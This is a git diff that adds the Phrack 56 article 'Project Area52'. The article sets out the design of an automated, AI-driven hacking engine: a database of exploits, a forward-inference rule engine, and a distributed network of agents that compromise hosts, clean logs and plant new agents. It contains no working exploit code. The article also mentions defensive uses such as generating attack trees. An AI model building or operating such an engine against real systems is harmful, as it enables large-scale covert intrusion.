+http://www.securityfocus.com/templates/archive.pike?list=1&date=1998-02-01&msg=199801301709.SAA12206@galera.icm.edu.pl
+
+
+----|  Authors' note
+
+This article is intellectual property of Lam3rZ Group.
+Knowledge presented here is the intellectual property of all of mankind,
+especially those who can understand it. :)
+
+
+|EOF|-------------------------------------------------------------------------|
diff --git a/phrack56/6.txt b/phrack56/6.txt
new file mode 100644
index 0000000..12e56c5
--- /dev/null
+++ b/phrack56/6.txt
@@ -0,0 +1,927 @@
+                      - P H R A C K   M A G A Z I N E -
+
+                            Volume 0xa Issue 0x38
+                                  05.01.2000
+                                  0x06[0x10]
+
+|------------------------------ PROJECT AREA52 -------------------------------|
+|-----------------------------------------------------------------------------|
+|------------------------ Jitsu-Disk <jitsu@nmrc.org> ------------------------|
+|----------- Simple Nomad <thegnome@nmrc.org> Irib <irib@nmrc.org> -----------|
+
+
+                             "Delirium Tremens"
+
+----|  Background
+
+Military tactics have evolved along with technology.  Reaching an objective is
+done with computed strategies gathering the impact of warfare on the field.
+This information is used to plan the next offensive.  As the NSA has pointed
+out, cyber-warfare happens much like its real-life counterpart, hence the
+same intelligence can be used.  This draft will try to explore the means and
+tools with which to build an automated attack engine based on a universal
+classification of attack strategies (regardless of the actual attacks).
+
+
+----|  Classification
+
+Writing the proper classification of computer attacks actually fills entire
+books [1], yet we can devise levels of access -- Read, Write and Modify --
+that an attacker can gain over a system.  The steps to achieve your goal will
+vary depending upon whether you are attacking remotely, locally, or even
+physically.  Achieving the goal is also dependent upon the security policy
+of the targeted system.
+
+The objective of the classification is to provide a means to universally 
+describe the levels of acquired access, depending on one's situation.
+
+Later we will explore the building of a generic engine to defeat various
+security policies on target systems through the steps described in the
+classification.
+
+To illustrate this we will attempt to define the classification of remote
+intrusion, based upon the OSI model.  A similar classification for physical
+and local intrusion can be derived, although this paper will mainly focus
+on the remote element.
+
+Various levels of access holds both logical properties and mathematical
+ones.  For example, a logical property might be "if you can read the TCP/IP
+stream you can read the networked layer".  A mathematical example might be
+"the Write property is intransitive; you can spoof traffic on the network
+yet not Modify existing data or hijack a session".  The mathematical issues
+are left as an exercise to the reader, the logical ones will be  used as
+the basis for the attack engine.
+
+The following is our classification:
+
+[ Acc : Access level
+    M = Modify capabilities
+    W = Write capabilities
+    R = Read capabilities ]
+
+ Situation : Remote
+ ------------------
+ 
+              OSI Layers   Acc  Implication
+
+           *--------------*
+           | Application  |
+           | 6            | M   Application rights, compromise all layers below
+           |              | W   DoS, unprivileged access
+           |              | R   Data gathering
+           |--------------|
+           | Session      |
+           | 5            | M   Session redirection, compromise all layers below
+           |              | W   DoS, service scanning
+           |              | R   Session Data gathering
+           |--------------|
+           | Presentation |
+           | 4            | M   Redirection, compromise all layers below
+           |              | W   DoS, scanning
+           |              | R   Data gathering
+           |--------------|
+           | Transport    |
+           | 3            | M   Redirection, compromise all layers below
+           |              | W   DoS, scanning
+           |              | R   Data gathering
+           |--------------|
+           | Network      |
+           | 2            | M   Redirection, compromise all layers below
+           |              | W   DoS, scanning
+           |              | R   Data gathering
+           |--------------|
+           | Data Link    |
+           | 1            | M   Redirection, compromise all layers below
+           |              | W   DoS, scanning
+           |              | R   Data gathering
+           |--------------|
+           | Physical     |
+           | 0            | M   Redirection
+           |              | W   DoS, scanning
+           |              | R   Data gathering
+           *--------------*
+
+
+This attack-based model works top/down: if you can control the Application 
+(Modification rights to what it does), all dependent layers are compromised.
+To be more specific, all dependent layers of the specific process you control
+are now "owned" by you.  If you control sendmail you may fool around with
+all associated network functions, in the scope of access rights.  Hence, if we
+define our "attack goal" to be "running a shell as root on the target system",
+a listening sendmail daemon running as root would be a good target.  If
+sendmail is compromised to the point of executing commands as root, the remote
+attacker could easily gain a root shell, thereby meeting the goal. If the goal
+was to establish a covert channel to the target for Denial of Service (DoS)
+purposes or for launching further attacks, then appropriate actions would be
+taken.
+
+On the other hand, having control of a lower level layer doesn't automatically
+guarantee you control of the above layer.  For example, as an attacker you
+might be sniffing the network and see two computers exchanging data.  But if
+this conversation is encrypted (and assuming you cannot decrypt the session)
+you could at best simply disrupt the conversation --  you would not control it.
+
+On the same layer their is a subtlety regarding the Read and Write
+capabilities: being able to Read and Write only your own data is of limited
+interest from an attacking standpoint, port scanning notwithstanding.  Hence
+we assume Read and Write capabilities are reached if you can Read and/or
+Write data we don't "own".
+
+Given the above definition of Read/Write for a layer, if one can both Read and
+Write a layer it MAY be able to Modify it at that layer as well.  However if
+encryption is in use, this is not guaranteed.  Therefore Read/Write
+capabilities on a layer is required yet insufficient for Modify capabilities.
+
+On a perfectly designed and secured system, one should not be able to get
+additional rights on a higher layer.  The attack engine works by exploiting
+security breach to progressively reach a desired goal given a starting point.
+For instance, achieving administrative access by starting with just the IP
+address of the victim.
+
+In order to illustrate some of this, let's define a very primitive 
+"Local Situation Access Classification" :
+
+ LS 
+ 
+  6  kernel level  (R,W,M)
+  5  drivers level (R,W,M)
+  4  process level (R,W,M)
+  3  user/group admin (R,W,M)
+  2  user/group "average" (R,W,M)
+  1  user/group null (R,W,M)
+
+Now that we hold a classification hierarchy of access level, we need to 
+apply this to the security breach we know of.
+
+For example in the NMRC Pandora project, a Hijacking attack called 
+"Level 3-1" would be referenced in this manner:
+
+Name        Systems  Versions       Level required Level gained
+----------- -------- -------------- -------------- ------------
+"Level 3-1" "Novell" "4.11","5 IPX" "Remote 3 M"   "Local 3 R W"
+
+This hack works on two levels -- a remote compromise of the IPX session,
+and the payload that will actually give you admin privilege.
+ 
+Another attack from Pandora called "GameOver" that exploits a bug looks
+like so:
+
+Name        Systems  Versions       Level required Level gained
+----------- -------- -------------- -------------- ------------
+"GameOver"  "Novell" "4.11","5 IPX" "5 W"          "Local 4 R W"
+
+In this case the process attacked is Bindery Supervisor equivalent in 
+rights. The Bindery Supervisor holds a restricted set of the Admin 
+rights. In this example we clearly see that this primitive description
+of Local Situation doesn't quite fit -- although we have achieved a 
+higher level we have a restricted set of rights compared to previous 
+attack. A better Classification is to be devised.
+
+The NMap[2] tool would be:
+
+Name        Systems  Versions       Level required Level gained
+----------- -------- -------------- -------------- ------------
+"NMAP"      "ALL"    "ALL"          "3 W*"         "5 R*"
+
+W* and R* mean Write and Read in a restricted sense.  Write implies valid
+data you can legitimately write, Read data that you "own".
+
+Two advantages are immediately obvious from this approach
+
+-- Recognition of re-usability in attacks (e.g. if you only have R*/W*
+   access in a 3com switched environment running an attack to overload the
+   switch MAC table would provide you with R/W access and opens doors to
+   new attacks).
+
+-- Independence of the type of code used for the attacks (scripts, Perl, 
+   C, etc.) with the actual hack engine.
+
+To facilitate the reference, the web's most popular hack archives [3][4][5]
+could automate this in their commentary.  This will be highlighted in the
+next section.
+
+Before we get there let's refine the classification method:
+
+ Assumptions
+ -----------
+ (1) For each situation (via network, via local process, via physical 
+     access) a set of layer between you and the goal are defined. 
+ (2) Each layer, independent from any other, are linked top-down.  
+ (3) A layer is defined by its uniqueness and the ability to associate 
+     Read/Write and Modify access levels for it. 
+
+ Implications
+ ------------
+ (1) Modify access in the highest layer implies control of all the preceding
+     layers (Layer N+1 includes Layer N), restricted by the given 
+     Classification (in a Remote Situation that would be the process's 
+     dependant layers, in a Local Situation, the runlevels).
+ (2) R/W/M access is a superset of R*/W*/M* where R*/W*/M* is the 
+     legitimate privilege access for a layer and R/W/M includes access
+     to more privileges for the same layer (M>M*,W>W*,R>R*).
+ (3) Read/Write access to a layer is required to gain Modify access but
+     is not sufficient.
+ (4) The concept of security breach comes from the fact that there exists
+     a way to gain access to a higher layer (or access level) by defeating
+     the security policy protocol between two layers (or access levels).
+
+For classification to be really universal and easily implemented, the three
+situations (Remote, Local, Physical) must be devised in layers that apply
+to all known systems. This might sound a bit utopic, yet the OSI model for
+remote access seems universal enough since virtually every networked system is
+either based on it or can be appropriately mapped against it. For Local access
+to a system (via a remote shell, local session or whatever) to be properly
+specified in layers, we should first look into what could be universally
+considered as local system security layers such as run levels, groups and
+users and hardware access (this has yet to be done).  Physical access, brings
+into light a world ruled by other means than just electricity, so things
+might not be so obvious.
+
+
+----|  Storage : A Hack Database
+
+Now that we have a Universal Classification for Remote, Local and Physical
+access, let's set the following abbreviations:
+
+                 Remote Situation : RS
+               Local Situation    : LS
+               Physical Situation : PS
+
+                          Layer N : L(N)
+                        Layer N-1 : L(N-1)
+
+                      Read access : R
+                     Write access : W
+                    Modify access : M
+
+           Restricted Read access : R*
+          Restricted Write access : W*
+         Restricted Modify access : M*
+
+A privilege level is defined by the "tuple" : (situation, layer(x), access).
+For example, ability to modify the application sendmail remotely (given OSI
+model above) would be sendmail (RS,L(6),M).  A remote buffer overflow in
+sendmail, that just requires an attacker to send a mail to the daemon would be
+listed this way:
+
+Name            Systems  Versions        Level required Level gained
+--------------- -------- --------------- -------------- ------------
+Sendmail-sploit All Unix Sendmail 8.10.1 (RS,L(6),W*)   (LS,L(3),M)
+
+We would also store the attack code in the database as well (remembering
+the actual attack engine will be separate).
+
+The stored code would return a value indicating attack success or failure,
+and could also return parameters to be used with further attacks on completion.
+For instance, a successful remote Sendmail buffer overflow would return TRUE
+and a handle to the remote shell; then the attack would be taken to the
+LS level where local attacks would be run to get runlevel 0 access (or root).
+This means the attack engine would run stored functions in a dynamic database,
+such as:
+
+*------------*             *-----------*
+| Attacks    |             | Results   |
+*------------*             *-----------*
+| Attack_ID  |             | Result_ID | 
+| Name       |             | Type      |
+| System     | 0,1---0,N-> | Identifier|
+| Version    |             *-----------*
+| Level Req  |             | Handle    |
+| Level Gain |             *-----------*
+*------------*
+| Code       |
+*------------*
+
+Attack_ID and Result_ID are unique. 
+
+The relation between the Attack table and the Result table is "one to many".
+An attack could have been completed successfully on various targets.  A
+"result" is linked to one and only one attack.
+
+In the result table the Type defines whatever it is, a temporary hack or a 
+permanent one (like a backdoor), the Identifier specifies a unique name to
+the target (IP address, DNS name...).
+
+The handle would be a pointer to a successful hack, based on the situation,
+i.e. in a Remote attack a pointer to a Libnet[6] structure, in a Local attack
+a pointer to a shell, a remote cmd.exe...
+
+The "Code" part in the "Attack table" would be either the source code, which 
+means we have a built-in compiler in the engine, the attack binary code that
+would require platform specific code to be pre-built, or some sort of
+scripting language we would rewrite all attacks with (see Nessus in comparison
+chapter below).
+
+Those specifications are far from completed and the database is very simple, 
+but you get the point.  The idea is to separate on the diagram what is gained
+from knowledge (Attacks), to what is gained in the wild (Results).  Just as 
+an example, that could be :
+
+         (known exploits code) 	
+Systems-0,1-0,N-Vulnerabilities-0,N-0,1-Instructions
+(known systems)	  |  (known related instructions/daemons/programs...)
+                  |
+                 0,1
+                  |
+                 0,N
+                  |
+Result (handles to hack, Libnet stack, shell ...)	
+                  |  (& collected info, e.g. [10.0.0.1] is [Novell 5sp3])
+                 0,N
+                  |
+                 0,1
+                  |
+Target (standard specification of target IP,Name...) 			 
+
+
+This approach implies either standardized interfaces of hacks (normalized input
+parameters and output handles), or a "Superset Code" could be written, that 
+given the attacks specifications (input parameters, Level Req'd, Level Gained),
+would wrap the attack, run it, and return values in our standard form.  Since
+writing regular expression engines is, ahem, NOT fun maybe we could decide for 
+the first solution.
+
+With respect to what we have seen in the Classification of the Remote
+Situation, we stated that compromising a layer is understood in the restricted
+sense of the attacked application's layers.  Yet we could assume that
+compromising an application, say Sendmail, would give you control over another
+one, maybe DNS in this case.  We need to be able to describe this in the
+database -- compromising an application might give you control over some
+others. A schematic representation would be:
+			
+0,1-[hack_id]-0,N (recursive link - a hack grants you access to more than)
+        |             | (one system/instructions)
+     (known exploits code)
+      (and access levels) 	
+Systems-0,1-0,N-Vulnerabilities-0,N-0,1-Instructions
+(known systems) |  (known related instructions/daemons/programs...)
+                |
+               0,1
+                |
+               0,N
+                |
+ Result (handles to hack, Libnet stack, shell ...)	
+                |    (& collected info, e.g. [10.0.0.1] is [Novell 5sp3])
+               0,N
+                |
+               0,1
+                |
+Target (standard specification of target IP,Name...) 			 
+
+
+So we have now a pretty good idea of what the unified hack database would look
+like:
+
+1) A knowledge database of known systems, systems instructions and associated
+   exploits.
+2) The database would have a standard for describing all fields.
+3) It would define the level required/level gained "tuples" (situation,
+   layer(x),access), for each known exploit.
+4) Exploit code would be stored in the database and follow a standard
+   representation of the interface (normalized input parameters and
+   output handles). 
+
+There exists today an international effort for a standard way to describe 
+exploits.  Such databases are in their infancy, but strong projects like 
+CVE[7] are certainly breaking new ground.
+
+The aim of such standardization is to achieve unified descriptions of attack
+scenarios (to be used in attack automation, either via vulnerability
+assessment tools or actual penetration tools).  Therefore our attack engine
+would offer three modes:
+
+  - Simulation (no actual attack performed, but we could use results for
+    vulnerability assessments, future attack scenarios, etc), 
+  - Manual (attack performed manually, no wrap code, like the mils;-)), 
+  - Automated (the ultimate Hacking Machine). 
+
+
+----|  Artificial Intelligence
+
+The reader might not be trained in AI, so let's attempt to define some 
+of the principles we need for this discussion.
+
+  --|  Intelligence
+
+AI is by no means meant to "create", but rather to "think".  Thinking,
+logically and reproducibly, is a process, therefore it may be mimicked by a
+machine.  In fact, given the proper thinking strategy and process a computer
+solves known problems much faster than humans.  Building a new Hack is a
+simple process if the methodology is known.  If the methodology is not known
+you must create it.  When no logical path takes you to where you want to go you
+have to create a new Hack when it can't be related to any other hacks.  The
+new Hack then enrichs the world of known hacks, and can possibly be added to
+the overall Hack process.  It is assumed that AI can solve our problems, given
+the following restrictions:
+
+  1) The problem solving time is, generally, unpredictable and may 
+     even take years if done manually.
+  2) The problems that can't be solved because an individual doesn't 
+     hold enough "process knowledge" for resolution (or the knowledge
+     necessary can't be described with the formalism we've chosen, see
+     the Godel theorem of incompleteness and the book "Godel Escher 
+     Bach, The Eternal Golden Braid" by Douglas Hofstadter). 
+
+In other words, any system can be hacked; granted we have enough time and 
+known hacks for this purpose.
+
+  --|  Inference
+
+The "thinking engine" we want to use here will have to use known facts
+(hacks) against field results, to explore the paths that takes us to the 
+ultimate goal (or result).  Such engines are described in AI as "inference
+engines", starting from the goal and finding a possible path to the knowledge
+base is called "backward inference", starting from the knowledge base and
+finding a path to the goal is called "forward inference".  In the present case
+"backward inference" is only good for simulation, but in the field we can only
+use "forward inference" (which is algorithmically known as being slower than
+backward inference).
+
+The initial theory behind inference engines is based on two "logic" rules,
+one for forward inference called Modus Ponens (MP) the other for backward
+inference called Modus Tollens (MT).  MP states that [if (P) AND (P includes Q)
+THEN (Q)], MT says [if (NOT Q) AND (P implies Q) THEN (NOT P)].
+
+  --|  The Inference Engine
+
+Algorithmically speaking, the Inference Engine is a recursive algorithm that
+takes a set of known facts as input (target is www.blabla.bla), processes it
+against the database of rules (if RedHat 5.0 then SendMail is vulnerable) and
+adds a new facts to the set (if target is RedHat 5.0 then target is vulnerable
+to SendMail bug).  The engine stops when either we have reached our goal
+(target is compromised) or we can't add anything new to the set of facts (all
+possibilities have been explored).  In order to optimize the process, the
+Inference Engine is set to use strategies in choosing which rules to test first
+(buffer overflow might be easier to try than "tmp race", so we set the engine
+to try a buffer overflow first).  As discussed in the following "distributed"
+section, it is essential to see that the hacking process is not in the engine 
+itself, but in the database rulesets. For instance, tests would be performed
+to understand the target installation/setup/OS and match the subsequent hacks,
+the engine provides the mechanism for this and the rulesets the paths to
+understand how one must attack. It is in the description of the ruleset that
+we have the actual "Intelligence", hence if a new OS appears on the market
+with a new security mechanism, we do not need to rewrite the engine, but
+specify new rules specific to this OS.
+
+  --|  An Inference Engine of order 0
+
+Consider a ruleset that contains no variables, only static facts:
+
+If monkey close to tree, monkey on tree
+If monkey on tree AND banana on tree, monkey eat banana
+
+We use "order 0" inference engine (O.K AI pals, this is not quite the
+definition, yes there is a whole theory behind this, we know, don't flame us).
+
+With the initializing fact
+ monkey close to tree
+
+we will get
+ monkey on tree
+
+and finally 
+ monkey eat banana
+
+  --|  An Inference Engine of order 1
+
+If the ruleset contains variables :
+ If monkey close to (X), monkey on (X)
+ If monkey on (X) AND banana on (X), monkey eat banana
+
+The inference engine that processes the rules and operates variable
+substitution is said to be of order 1 (And if you're curious to know, there is
+no engine of order 2 or higher, all problems are proven to be described in
+order 1). This is the type of engine we want to use, as it allow us to use
+variables -- they will be the "handles" resulting of our hacks.
+
+  --|  Pattern Matching
+
+Just like there are interpreted languages and faster-running compiled ones,
+there are AI Inference Engines based on "interpreted rulesets" and other
+based on "compiled rulesets".  Compiling the ruleset means you have to
+rearrange it in such a way that is "immediately efficient".  The compilation
+method we're interested in is called Pattern Matching and is based on binary
+trees.  For instance, lets assume the following:
+
+Initial database:
+ 
+Name        Systems  Versions       Level required Level gained
+----------- -------- -------------- -------------- ------------
+d0_v8-BOF   Unix,All Sendmail 8.8.* (RS,L(6),W*)   (LS,L(3),M)        
+d0_v9-BOF   Unix,All Sendmail 8.9.1 (RS,L(6),W*)   (LS,L(3),M)        
+
+Ruleset:
+
+if system[X] is Unix AND Version[Y] is Sendmail 8.8.* AND 
+Level_s[Z] is RS AND Level_l[Z] is 6 AND Level_a[Z] is W* AND 
+Hack(d0_v8-BOF,X) THEN Level_a[Z] is [LS,L3,M]
+
+if system[X] is Unix AND Version[Y] is Sendmail 8.9.1 AND 
+Level_s[Z] is RS AND Level_l[Z] is 6 AND Level_a[Z] is W* AND 
+Hack(d0_v9-BOF,X) THEN Level_a[Z] is [LS,L3,M]
+
+Compiled ruleset for pattern matching:
+
+
+           system
+             |
+         [Sendmail]
+             |
+          version
+             |
+           [UNIX]
+             |
+          level_s
+             |
+            [RS]
+             |
+          level_l
+             |
+            [6]
+             |
+          level_a
+             |		
+            [W*]
+             |
+            FUNC
+           /    \
+          /      \
+         /        \
+        /          \
+   [d0_v8-BOF]  [d0_v9-BOF]
+        \          /
+         ----------			   
+             |
+             *
+         level_s [L]				
+         level_l [3]
+         level_a [M]
+
+[] are used to represent variables, filled in for clarity
+
+The tree is parsed from the top every time a new fact is added to the
+knowledge database, and this allows for a dynamic-algorithm (i.e. intelligent
+self-modifying knowledge base).  When the tree is parsed and brings in a new
+fact, the knowledge base is increased with this fact, and the tree is parsed
+again for more facts... 
+
+Since an attack happens in different phases (see distributed chapter below),
+facts may have different impacts.  They may just be collected facts (system is
+RH6.0, buffer overflow on sendmail possible, "poor default config" exploit
+on sendmail possible), or facts that trigger attacks (buffer overflow and
+"poor config" exploits possible, rule says test config first -- config exploit
+will be tested and result added to database, we gain new rights or we move on).
+
+Optimization comes from the fact that whereas in the flat ruleset sample all
+rules must be parsed to find the matching one, in a tree-like representation a
+simple pattern matching mechanism shows the right branch.  Although it's a pain
+to compile such a ruleset into a tree is not obvious for a few rules on our
+database, it really shows if the database contains thousands of facts. Besides,
+once the database is compiled into a tree, it's done and you dont have to do it
+again (insertion of new elements into a tree is possible, yet the tree could
+also be recompiled on each new addition).
+
+More optimization, not for engine itself but in the hacking sense, can be
+achieved if we set some "grading rules" per attack and organize the tree this
+way -- say we know two attacks for Sendmail, same version, one relies on a
+complex buffer overflow and the other on misconfiguration.  The
+misconfiguration should be tried first (if the buffer overflow fails we might
+kill Sendmail altogether), hence given a higher mark.  This marking process
+would look at two factors -- the level required to perform attack and method
+use, for instance:
+
+Situation - Grade - Level - Grade - Method - Grade
+
+Remote      +100      6      +60    Config    +3
+Local       +200      5      +50    Filesys   +2 
+                      4      +40    BuffOver  +1	
+			  ...		
+
+The guarding mechanism can be automated in the AI, the method is another piece
+of information to be Classified and stored in the Hack Database.
+
+  --|  A Pattern Matching, Forward Inference Engine of Order 1
+
+So what we're looking for is :
+
+An AI engine, of forward inference type, of order 1.  The engine is better
+optimized, like in pattern matching for instance and it allows for function
+executions.
+
+An academic sample of such an algorithm is the RETE algorithm (beyond the scope
+of this preliminary discussion) and the interested reader is directed to the
+paper by Charles L. Forgy in "Artificial Intelligence" : "The RETE Matching
+Algorithm" (Dept of Computer Science, Carnegie-Mellon University). You could 
+also look into a similar systems called OPS and TANGO ("OPS5 user's manual" by
+the same author and "TANGO" by Cordier-Rousset from L.R.I of Orsay Faculty in
+France).  Working code of RETE can be found at the MIT repository [8].  You
+can also check Pr. Miranker's Venus project [9].  Original code for OPS exists
+in LISP [10].  However, the one piece of work that would definitely match
+our expectation is a system called CLIPS, written in C, by NASA (initially
+by NASA, but now it is maintained in the public domain) [11].
+
+  --|  The Hacking Engine
+
+The engine will first query the database of facts for all known hacks sorted
+in the classification form we defined along with systems and versions
+information, these known hacks are written as a set of rules the exact
+representation of hacks into rules is linked to the engineitself and is yet to
+be defined.
+
+Then this ruleset is compiled into a binary tree (or some other efficient
+data structure) for better optimization, provided a proper optimizing
+strategy (which may branch to the left-most side for instance, maybe granted a
+difficulty grade per attack).  The optimizing strategy might take the
+classification rules into account to decide that if a higher level is reached,
+all branches that refer to lower level attacks must be ignored -- this would
+be a called "restrictive optimization".
+
+The engine is initialized with the initially known facts (target id), and
+starts applying rules to these facts in order to get more information out of
+them, until the goal is reached or all branches have been explored.  The
+engine in simulation mode would only use the initializing facts and match
+function calls with them, in manual mode the hacker would be provided the
+function code by the engine that would then wait for the result, in automatic
+mode the engine would run the code itself.
+
+
+----|  Distributed paradigm
+
+Distributed hacking theory, analysis and advantage has been extensively
+reviewed in an excellent article by Andrew J. Stewart entitled "Distributed
+Metastasis [12].  Hence we will base this proposed implementation on it,
+please refer to the above article.
+
+  --|  Distributed Schematic
+
+In a distributed attack, the attacker (A) is the "parent" of all nodes
+(agents).  Each node is characterized by a running agent (the hacking engine),
+its address (IP,IPX...), and the level the agent is running at.  For instance:
+
+   [10.0.0.1,A,parent], knows (10.0.2.1,10.0.2.5,10.0.3.1)
+                              |
+                              |
+             ----------------- -----------
+            |                             |
+[10.0.3.1,A1,(LS,L(3),M)]    [10.0.2.1,A2,(LS,L(3),M)], knows 10.0.2.5
+                                          |
+                             [10.0.2.5,A3,(LS,L(3),M)]
+
+
+The attacker knows the existence of all nodes, but communicates through the
+hierarchy (to send a command to 10.0.2.5, he issues this to 10.0.2.1 for
+routing).  This keeps risk to a minimum, should any of the agents be
+discovered.  When 10.0.2.5 tries to talk to the attacker, he sends stuff via
+10.0.2.1 -- A3 knows A2 but not A.  It is obvious that if any of the nodes
+are to be uncovered, attached parent node and child nodes could be too.  In
+this case, the Attacker could issue a direct order to any of the potentially
+compromised agents to either "attach" themselves to somewhere else, or to
+sacrifice the agent's "territory" and have the agent eliminate itself.
+
+Example: Agent 10.0.2.1 was discovered, the Attacker decides to attach
+10.0.2.5 to 10.0.3.1 and sacrifice 10.0.2.1.
+
+      [10.0.0.1,A,parent], knows (10.0.2.5,10.0.3.1)
+                              |
+                              |
+             ----------------- -----------
+            |                             |
+   [10.0.3.1,A1,(LS,L(3),M)]              x
+               |
+   [10.0.2.5,A3,(LS,L(3),M)]
+
+To ensure better privacy, encryption is to be used at each node for the 
+database of "parent&child" they have.
+
+At least two other secret-routing systems can be used:
+
+1. A child knows its parent address, but parent doesn't know its children.
+All communication to a child would first require a request to the top 
+node (A) to learn the location of the children.  This would ensure lesser
+risk to compromise an entire branch in case one of the node is uncovered
+
+      [10.0.0.1,A,parent], knows (10.0.2.5,10.0.3.1)
+                              |
+                              |
+             ----------------- -----------
+            |
+[10.0.3.1,A1,(LS,L(3),M)]	
+            * |
+              | x	
+ [10.0.2.5,A3,(LS,L(3),M)]
+
+A3 knows how to talk to A1, A1 asks A for who to talk with.
+
+2. All nodes in the tree (except for A) don't know the other nodes' addresses
+but know the subnet on which the node resides and may sniff packets.  For
+instance A1 would send packets to 10.0.2.6, whereas 10.0.2.6 discards it but
+10.0.2.5 sees the data and replies to 10.0.3.2. [13]
+
+
+  --|  Distributed & Simultaneous Attack
+
+Phase 0
+
+The actual attack happens in phases.  The attacker decides on a target and the
+level desired.  Then the AI will look in the known set of Agents, and the
+defined rules for attack optimization.  For instance, if we want to attack
+10.0.3.2, the AI could decide to pass the attack to 10.0.3.1.  The AI could
+also decide for multiple agents to attack at once (hence the distributed
+paradigm), in this case, collected information (the knowledge base) is passed
+between each phase to the Attacker, who could decide to redistribute it to
+the attacking agents.
+
+Phase 1
+
+Once a given Agent has received an order to attack, it queries its parent node
+for updated hacking database entries.  Depending on the initial Attack order
+issued, this query might move up to the Attacker or not happen at all.  If
+the communication model used is hierarchical, we could even implement this in
+DNS queries/replies to benefit from the existing code (see Phrack [14] issues
+50-53 on this).
+
+Phase 2
+
+The agent performs ruleset optimization as discussed previously chapter.
+
+Phase 3
+
+The agent updates or build its RETE vulnerability tree.
+
+Phase 4 
+
+The agent satisfies the first "target detection" ruleset (this includes host,
+service, network topology, OS, Application layer info detection), before
+moving to the next phase.  This happens exclusively as an RS.  In the case of
+a simultaneous attack (by many agents for one target) information gathered is
+moved to the Attacker who might push back other info gathered by the other
+agents.
+
+Phase 5
+
+The Agent actually attempts to compromise the target.  This phase is not
+completed until the level of access the attacker decided upon is reached, and
+the "target clean-up" (cleaning the logs) rulesets are satisfied.  The cleanup
+rules might even trigger the necessary hack of another box where the logs may
+reside -- it is common practice in security administration to log to a
+different machine (especially at high profile sites with high profile targets).
+This phase might fail upon unsuccessful hacks or a timeout.
+
+Phase 6
+
+Install the hacking engine child on target. Target becomes part of the tree as
+a subordinate of the successful attacking agent.  The Attacker is notified of
+the new acquisition.
+
+Phase 7
+
+The new agent goes into passive mode -- it waits for input from its parent and
+monitors traffic and trust relationships locally to increase its local
+knowledge database.  On a regular basis the agent should "push" info to its
+parent, this is necessary if the agent is behind a firewall or the address is
+set dynamically.
+
+Note: Phase 4+5+6 are the so-called "consolidation components".
+    
+The Simultaneous aspects of attack are controlled by the Attacker and not by
+delegation to other parent nodes.  This could be called Centrally Controlled
+Distributed and Simultaneous Attack.
+	
+Let's summarize the phases:
+
+Engine       Phase  Comments
+-----------  -----  --------
+AI             0    Decide for agent(s) to attack target
+Incremental    1    Database query
+AI             2    Ruleset optimization
+Incremental    3    Tree build
+AI             4    Target information gathering
+AI             5    Compromise target, cleanup
+Incremental    6    Seed target
+AI             7    New agent enters passive mode
+
+Other concepts can be put into this, such as cryptography and multiple target
+acquisition at once.  It would certainly be an interesting exercise to write a
+valid algorithm for all this.
+
+
+----|  Comparison
+
+  --|  COPS Kuang system
+
+The "Kuang system", a security analysis tool developed by Robert W. Baldwin of
+MIT is included in COPS security package available from Purdue University [15].
+The Kuang system is a ruleset-based system used to check UID/GID's rights on a
+local system, i.e. it processes a knowledge base (list of privilege
+users/files, list of rights needed on users/files to attain their level of
+privilege) against a set of rules (if any user can write a startup file of
+root, any user can become root).  The ruleset is written as such that it is
+"string parsable" in the inference engine (which is a forward inference engine
+of order 1). The system can perform tests stored in a shell script to decide
+if a rule is satisfied by the configuration of the system it is currently
+running on.
+
+In comparison to what is described in this paper, the Kuang system evolves
+between (LS,L(1)) and (LS,L(3)).  It uses a non-optimized forward inference
+engine that performs Phase(4) of our distributed scheme.
+
+We should consider the Kuang system as a working-case study, to build Area52.
+
+  --|  A sample vulnerability scanner : Nessus
+
+The Nessus Open source project [16] aims at providing a free security scanner.
+It works by testing systems (remote/local) for known vulnerabilities.  The
+Nessus developers wrote a scripting language for this purpose -- we mentioned
+earlier that the actual coding attacks should be freely coded in a highly
+portable language for our proposed system.  Yet the Nessus approach is not to
+be neglected -- could we use the Nessus effort and extend its scripting
+language so to actually re-write all exploits?  This would mean a continuous
+effort in writing the project, but then alleviates many compatibility and
+database issues.  We could even hope for a "common hacking language" relying
+on multi-platform libraries like libpcap and libnet as core components.
+Until an open source vulnerability scanner that can run on multiple platforms
+comes along, this is a fairly attractive piece of technology.
+
+  --|  Another Approach : Attack Trees
+
+As is probably obvious, this "ultimate hack tool" could be used to help
+protect as well as compromise.  While most of the discussion has been from the
+intruder perspective, we could easily use the tool for our own vulnerability
+assessment.  If we feed the knowledge database with all relevant information
+about our own network and run the engine in simulation mode, this will output
+a possible sequence of attack.  Then, if the engine is told to search for ALL
+possible sequences of attack, and the output can be arrange as a tree of
+attack sequences (much like the tree of known vulnerabilities describe above),
+this would provide a means to help automatically generate "Attack Trees", as
+described by Bruce Schneier of Counterpane Internet Security in Dr. Dobb's
+Journal [17] (December 1999).
+
+  --|  Others...
+
+Some distributed denial of service tools, have caused quite a stir in security
+circles lately [18].  Those tools expose an interesting sample of distributed
+communication and data tunneling, which code could be reused in the project
+outlined in this paper.  The main problem with these denial of service tools
+is that their main output (floods of packets against a target) is never seen
+by the Attacker, which is what we would certainly require.
+
+
+----|  References
+
+[1]  See discussions by Dr Ross Anderson from University of Cambridge
+     http://www.cl.cam.ac.uk/Teaching/1998/Security/
+     
+[2]  NMap by Fyodor.
+     http://www.insecure.org/nmap
+
+[3]  PacketStorm
+     http://packetstorm.securify.com 
+
+[4]  Security Bugware
+     http://oliver.efri.hr/~crv
+
+[5]  Security Focus
+     http://www.securityfocus.com/
+
+[6]  Libnet multi-platform packet mangling
+     http://www.packetfactory.net/libnet/
+
+[7]  Common Vulnerabilities and Exposures
+     http://cve.mitre.org, a unified hack database
+
+[8]  RETE LISP implementation
+     http://www.mit.edu/afs/cs.cmu.edu/project/ai-repository/ai/areas/expert/systems/frulekit/ 
+
+[9]  Prof. Miranker Venus project in C++  
+     http://www.arlut.utexas.edu/~miranker/
+
+[10] Original OPS LISP code
+     http://www.cs.cmu.edu/afs/cs/project/ai-repository/ai/areas/expert/systems/ops5/
+
+[11] NASA RETE-like system, coded in C, very impressive!
+     http://www.ghg.net/clips/CLIPS.html
+
+[12] "Distributed Metastasis: A Computer Network Penetration Methodology"
+     by Andrew J. Stewart
+     http://www.phrack.com/search.phtml?view&article=p55-16
+
+[13] "Strategies for Defeating Distributed Attacks" by Simple Nomad
+     http://packetstorm.securify.com/papers/contest/Simple_Nomad.doc
+
+[14] Phrack Magazine
+     http://www.phrack.com/
+
+[15] Home archive of the COPS system
+     ftp://coast.cs.purdue.edu/pub/Purdue/cops/ 
+
